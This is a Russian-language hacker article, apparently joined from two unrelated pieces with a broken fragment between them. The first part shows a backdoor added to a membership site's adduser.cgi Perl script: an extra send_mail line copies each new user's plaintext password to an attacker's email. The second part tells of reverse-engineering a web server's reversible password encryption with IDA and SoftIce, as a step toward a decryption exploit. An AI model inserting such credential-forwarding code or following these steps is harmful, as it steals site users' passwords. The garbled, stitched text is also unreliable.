И так скрипт adduser.cgi

#######################################################################
# Clear Buffer and Print HTTP Header. #
#######################################################################

Покусано за ненадобность приводить лишний текст , ясно что с самом скрипте
мы нечего кусать не будем , только добавлять !

#######################################################################
# Require Libraries. #
#######################################################################

Здесь подсоединялись необходимые библиотеки .Покусано !

#######################################################################
# Gather Form Data. #
#######################################################################

Получение данных из формы . Покусано.

#########################################################################
#
# Check to make sure the user is not in our blacklist!!!
#
#########################################################################

Проверка на существование вашего Email в black List 'e ! :) Можно кстати
очистить Black List :) Только не удалять совсем ! Скрипт работать не будет!
Путь к Black List 'у тут был.
Покусано !

###########################################################################
#
# Calculate the account expiration date
#
###########################################################################

Здесь было ( нетрудно догадаться из названия) вычисление даты истекания
действия регистрируемого аккаунта . Можно заменить сразу на какую ни будь
эээ 2007 год, ну или типа этого . Во велика вероятность что администратор
почует что то неладное, так что не трогаем ! Покусано !

###########################################################################
#
# Change the $expire_month to Name month like January, February, etc...
#
###########################################################################

Преобразование. Покусано !

###########################################################################
#
# Generate an user password randomly
#
###########################################################################

Здесь генерируется пароль пользователя . Можно поменять на какой ни будь свой.
Покусано !

###########################################################################
#
# Create an user account to access the membership section
#
###########################################################################

Секция подавления пользователя в базу !
Я ее тоже покусаю ! :(

###########################################################################
#
# Send an e-mail to the user for their login name and password
#
###########################################################################

Ну вот нужная мне секция . Я решил пусть все пароли и мне на Email приходят,
что им жалко что ли ?

$email_body .= "Thank you for joining трали вали site Please write down
your username\n";
$email_body .= "and password for future reference.\n\n";
$email_body .= "Your Username = $form_data{'email'}\n";
if ($form_data{'autobill'} eq "NO")
{
$email_body .= "Your Password = $pwd\n";
$email_body .= "Your account will expire on: $expire_month $expire_day,
$expire_year\n\n";
$email_body .= "Your Account expires automatically and is NOT renewed
so there is\n";
$email_body .= "no need to cancel. Should you have any questions or
wish to cancel\n";
$email_body .= "your membership please go to трали вали l\n\n";
}
elsif ($form_data{'autobill'} eq "YES")
{
$email_body .= "Your Password = $pwd\n\n";
$email_body .= "For your convenience all accounts are renewed
every 30 days.
Should you have any questions\n";
$email_body .= "or wish to cancel your membership please go to вот
эту ссылку\n\n";
}

$email_body .= "Enjoy your visit at трали вали site !\n";

$admin_email = "lamo@lamo.com";

Вот к этой строке добавляем еще одну .
&send_mail("$admin_email","$form_data{'email'}",
"Your account is activated...\n\n", "$email_body");
&send_mail("$admin_email","c00lhacker@blabla.com",
"Your account is activated...\n\n", "$email_body");

open (MEMBER, ">>c:/inetpub/scripts/Members/$form_data{'email'}.user")
|| &CgiDie
("I am very sorry, but I was unable to open the user's cart in
the Add to Shopping Cart routine. The location and name that I
have is ./Member/$form_data{'email'}.user Would you
please make sure that the web server has permission to manipulate
that file and the path is defined correctly in the setup file.");

print MEMBER "$email_body";
close (MEMBER);

if ($form_data{'autobill'} eq "NO")
{
&send_mail("$admin_email","billing\@hentailand.com,
staff\@hentailand.com",
"Non-autobill New Member $form_data{'email'} manually
created...\n\n", "$email_body");
}
elsif ($form_data{'autobill'} eq "YES")
{
&send_mail("$admin_email","billing\@hentailand.com,
staff\@hentailand.com","AutoBill
New Member $form_data{'email'} manually created...\n\n",
"$email_body");
}

exit;

Ну вот собственно и все ! Ниже идут процедуры используемые скриптом
я их тоже покусаю .

sub valid_address
{
Покусано !
}

sub page_header
{
Покусано !
}

Цель которую я преследовал при написании этой статьи , это дать понять некоторым личностям , что Deface сайта это не цель ! Можно выудить очень много интересного если постараться ! И еще одно ! Не надо делать оценки какой либо группы по количеству Defac'ов . Их можно сделать хоть 250 за один присест особо не напрягаясь (все ограничивается скоростью вашего модема) ! Если кто сомневается могу показать :)

Current Password

Поменяв ее на

Current Password

И перезапустив сервер. Я с радостью для себя увидел пароли пользователей ОТКРЫТЫМ текстом. Вот оно ! Я сам нашел дырку в программном обеспечении ! Да я понимал, что она не даст мне удаленно администратора или root'а , но это была дырка !
Далее я начал глобальный поиск по винту. Я думал что сервер хранит пароли еще где то кроме passwd , и там они лежат в открытом виде. Я обломался. Оказалось что прога все таки хранит пароли в зашифрованном виде, но шифрует она их так что можно сделать обратную операцию. То есть алгоритм был обратимым. Осталось дело за маленьким, вернее как оказалось за большим, найти этот кусок кода.
Началось исследование.
Первое что я сделал:
Tdump.exe sacrypt.exe>liblist.txt
На выходе получил файл , который содержал список используемых библиотек и функций в этих библиотеках.
Turbo Dump Version 5.0.13.1 Copyright (c) 1988, 1997 Borland
International Display of File SACRYPT.EXE
-/ покусано /-

Imports from sambarcm.dll
cm_twowayinit(hint = 00bf)
cm_twowayencrypt(hint = 00be)
cm_bin2hex(hint = 0002)
Ну вот нашлось ! cm_twowayencrypt. Покопавшись IDA в той самой sambarcm.dll оказалось , что там еще есть и cm_twowaydecrypt. Отсюда Первое правило ! При ислользовании библиотек называйте функции не таким явным образом ! Это затруднит , хотя и не очень сильно действия при Reverse Engineering'е.
Правило Второе ! Если вы не используете библиотек, и все функции у вас находятся в теле программы, ВЫКЛЮЧАЙТЕ Debug Info. Последствия те же.
Далее путем полученного кода от IDA , я начал ковырять cm_twowaydecrypt. Реализация алгоритма была написана на ассемблере, так как лишнего кода не наблюдалось. И при написании exploita , который кстати я никак не допишу, можно просто вставить код в свою программу без всяких изменений. Код приводить не буду , вам разве интересно смотреть на 15 страниц ассемблера ?
Однако необходимо было сделать еще несколько вещей. Как показал анализ кода, алгоритм использует пять таблиц, по 1024 байта каждая. При чем эти таблицы не были статическими, а генерировались по какому то хитрому алгоритму. Но мы пойдем другим путем ! При помощи SoftIce и маленькой утилиты SoftDump я вытащил эти таблицы из памяти , записав их в файлы соответственно: table1.dat , table2.dat ... Дело оказалось за малым , код есть , таблицы есть, надо состыковать все это и вот вам конечный продукт ! Блин но как же мне это влом делать ! Удачи ! mam0nt.